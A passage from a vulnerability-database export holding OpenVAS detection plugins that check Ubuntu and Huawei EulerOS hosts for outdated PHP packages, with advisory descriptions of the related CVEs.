remote attacker could use this issue to inject arbitrary session\ndata. (CVE-2016-7125)\n\nIt was discovered that PHP incorrectly handled certain gamma values in the\nimagegammacorrect function. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2016-7127)\n\nIt was discovered that PHP incorrectly handled certain crafted TIFF image\nthumbnails. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly expose sensitive information.\n(CVE-2016-7128)\n\nIt was discovered that PHP incorrectly handled unserializing certain\nwddxPacket XML documents. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2016-7129, CVE-2016-7130, CVE-2016-7131,\nCVE-2016-7132, CVE-2016-7413)\n\nIt was discovered that PHP incorrectly handled certain memory operations. A\nremote attacker could use this issue to cause PHP to crash, resulting in a\ndenial of service, or possibly execute arbitrary code. This issue only\naffected Ubuntu 16.04 LTS. (CVE-2016-7133)\n\nIt was discovered that PHP incorrectly handled long strings in curl_escape\ncalls. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code. This\nissue only affected Ubuntu 16.04 LTS. (CVE-2016-7134)\n\nTaoguang Chen discovered that PHP incorrectly handled certain failures when\nunserializing data. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2016-7411)\n\nIt was discovered that PHP incorrectly handled certain flags in the MySQL\ndriver. Malicious remote MySQL servers could use this issue to cause PHP to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2016-7412)\n\nIt was discovered that PHP incorrectly handled ZIP file signature\nverification when processing a PHAR archive. A remote attacker could use\nthis issue to cause PHP to crash, resulting in a denial of service, or\npossibly execute arbitrary code. (CVE-2016-7414)\n\nIt was discovered that PH ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"php7.0 on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3095-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3095-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.5.9+dfsg-1ubuntu4.20\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.5.9+dfsg-1ubuntu4.20\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.5.9+dfsg-1ubuntu4.20\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.5.9+dfsg-1ubuntu4.20\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.5.9+dfsg-1ubuntu4.20\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.5.9+dfsg-1ubuntu4.20\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.5.9+dfsg-1ubuntu4.20\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1ubuntu3.25\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1ubuntu3.25\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1ubuntu3.25\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.10-1ubuntu3.25\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1ubuntu3.25\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.10-1ubuntu3.25\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.3.10-1ubuntu3.25\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.8-0ubuntu0.16.04.3\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.8-0ubuntu0.16.04.3\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.8-0ubuntu0.16.04.3\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-curl\", ver:\"7.0.8-0ubuntu0.16.04.3\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.8-0ubuntu0.16.04.3\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-gd\", ver:\"7.0.8-0ubuntu0.16.04.3\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-mysql\", ver:\"7.0.8-0ubuntu0.16.04.3\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:35:26", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-1984)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9912", "CVE-2016-6288", "CVE-2015-5161", "CVE-2018-10545", "CVE-2018-5712", "CVE-2016-7125", "CVE-2017-11628", "CVE-2018-14851", "CVE-2015-8874", "CVE-2016-6292", "CVE-2015-4116", "CVE-2016-10159", "CVE-2016-6294", "CVE-2016-7128", "CVE-2015-7803", "CVE-2016-7418", "CVE-2018-17082", "CVE-2015-8866", "CVE-2018-10547", "CVE-2016-6291", "CVE-2016-10158", "CVE-2018-5711", "CVE-2015-7804"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191984", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191984", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1984\");\n script_version(\"2020-01-23T12:29:42+0000\");\n script_cve_id(\"CVE-2014-9912\", \"CVE-2015-4116\", \"CVE-2015-7803\", \"CVE-2015-7804\", \"CVE-2015-8866\", \"CVE-2015-8874\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-6288\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-7125\", \"CVE-2016-7128\", \"CVE-2016-7418\", \"CVE-2017-11628\", \"CVE-2018-10545\", \"CVE-2018-10547\", \"CVE-2018-14851\", \"CVE-2018-17082\", \"CVE-2018-5711\", \"CVE-2018-5712\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:29:42 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:29:42 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-1984)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1984\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1984\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-1984 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\nUse-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP before 5.5.27 and 5.6.x before 5.6.11 allows remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation.(CVE-2015-4116)\n\nA flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-7803)\n\nA flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-7804)\n\next/libxml/libxml.c in PHP before 5.5.22 and 5.6.x before 5.6.6, when PHP-FPM is used, does not isolate each thread from libxml_disable_entity_loader changes in other threads, which allows remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161.(CVE-2015-8866)\n\nStack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\nIt was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.(CVE-2016-10158)\n\nInteger overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.(CVE-2016-10159)\n\nThe php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\nThe exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~45.h15.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:00:02", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-07-03T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2020-1747)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2014-9767", "CVE-2016-7414", "CVE-2017-12933", "CVE-2019-11050", "CVE-2014-9912", "CVE-2016-6288", "CVE-2011-4718", "CVE-2017-9226", "CVE-2016-4540", "CVE-2015-8879", "CVE-2016-9935", "CVE-2016-5772", "CVE-2016-3185", "CVE-2018-10545", "CVE-2017-11143", "CVE-2018-5712", "CVE-2015-8867", "CVE-2019-19204", "CVE-2016-7125", "CVE-2016-4542", "CVE-2019-11041", "CVE-2017-11628", "CVE-2017-7272", "CVE-2016-2554", "CVE-2018-14851", "CVE-2019-11042", "CVE-2017-16642", "CVE-2015-6833", "CVE-2016-4070", "CVE-2015-8874", "CVE-2016-6292", "CVE-2016-9934", "CVE-2015-4116", "CVE-2015-6831", "CVE-2017-11147", "CVE-2016-10159", "CVE-2019-9641", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2016-4073", "CVE-2019-11043", "CVE-2016-6294", "CVE-2016-7128", "CVE-2015-8935", "CVE-2015-7803", "CVE-2016-7418", "CVE-2018-17082", "CVE-2015-8866", "CVE-2019-19246", "CVE-2016-10161", "CVE-2016-3141", "CVE-2018-10547", "CVE-2016-6291", "CVE-2016-10158", "CVE-2019-11047", "CVE-2017-11145", "CVE-2017-11144", "CVE-2015-6832", "CVE-2016-3142", "CVE-2018-5711", "CVE-2015-7804", "CVE-2016-7412"], "modified": "2020-07-03T00:00:00", "id": "OPENVAS:1361412562311220201747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201747", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1747\");\n script_version(\"2020-07-03T06:19:30+0000\");\n script_cve_id(\"CVE-2011-4718\", \"CVE-2014-9767\", \"CVE-2014-9912\", \"CVE-2015-4116\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-7803\", \"CVE-2015-7804\", \"CVE-2015-8866\", \"CVE-2015-8867\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2015-8935\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10161\", \"CVE-2016-10397\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4073\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4542\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-5772\", \"CVE-2016-6288\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7128\", \"CVE-2016-7412\", \"CVE-2016-7414\", \"CVE-2016-7418\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\", \"CVE-2017-7272\", \"CVE-2017-9226\", \"CVE-2018-10545\", \"CVE-2018-10547\", \"CVE-2018-14851\", \"CVE-2018-17082\", \"CVE-2018-5711\", \"CVE-2018-5712\", \"CVE-2019-11041\", \"CVE-2019-11042\", \"CVE-2019-11043\", \"CVE-2019-11047\", \"CVE-2019-11050\", \"CVE-2019-19204\", \"CVE-2019-19246\", \"CVE-2019-9641\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-03 06:19:30 +0000 (Fri, 03 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-03 06:19:30 +0000 (Fri, 03 Jul 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2020-1747)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.6\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1747\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1747\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2020-1747 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11042)\n\nWhen PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11041)\n\nAn issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\ngd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711)\n\nThe Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding: chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\nexif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\nAn issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\nAn issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS Virtualization 3.0.6.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.6.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~45.h30\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~45.h30\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~45.h30\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:36:54", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2438)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2014-9767", "CVE-2017-9224", "CVE-2016-7414", "CVE-2017-12933", "CVE-2014-9912", "CVE-2016-6288", "CVE-2011-4718", "CVE-2017-9228", "CVE-2017-9226", "CVE-2016-4540", "CVE-2015-8879", "CVE-2016-9935", "CVE-2016-3185", "CVE-2018-10545", "CVE-2017-11143", "CVE-2018-5712", "CVE-2017-9229", "CVE-2015-8382", "CVE-2015-8867", "CVE-2016-7125", "CVE-2016-4543", "CVE-2016-4542", "CVE-2017-9227", "CVE-2016-4541", "CVE-2019-11041", "CVE-2017-11628", "CVE-2017-7272", "CVE-2016-2554", "CVE-2018-14851", "CVE-2019-11042", "CVE-2015-8835", "CVE-2017-16642", "CVE-2015-6833", "CVE-2016-4070", "CVE-2015-8874", "CVE-2016-6292", "CVE-2016-9934", "CVE-2015-6831", "CVE-2017-11147", "CVE-2016-6293", "CVE-2019-11040", "CVE-2016-7411", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2016-7480", "CVE-2019-11043", "CVE-2016-6294", "CVE-2016-7128", "CVE-2015-8935", "CVE-2015-7803", "CVE-2016-7418", "CVE-2018-17082", "CVE-2015-5589", "CVE-2016-3141", "CVE-2018-10547", "CVE-2016-6291", "CVE-2017-11144", "CVE-2015-6832", "CVE-2016-3142", "CVE-2015-7804", "CVE-2016-7412"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192438", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2438\");\n script_version(\"2020-01-23T12:56:51+0000\");\n script_cve_id(\"CVE-2011-4718\", \"CVE-2014-9767\", \"CVE-2014-9912\", \"CVE-2015-5589\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-7803\", \"CVE-2015-7804\", \"CVE-2015-8382\", 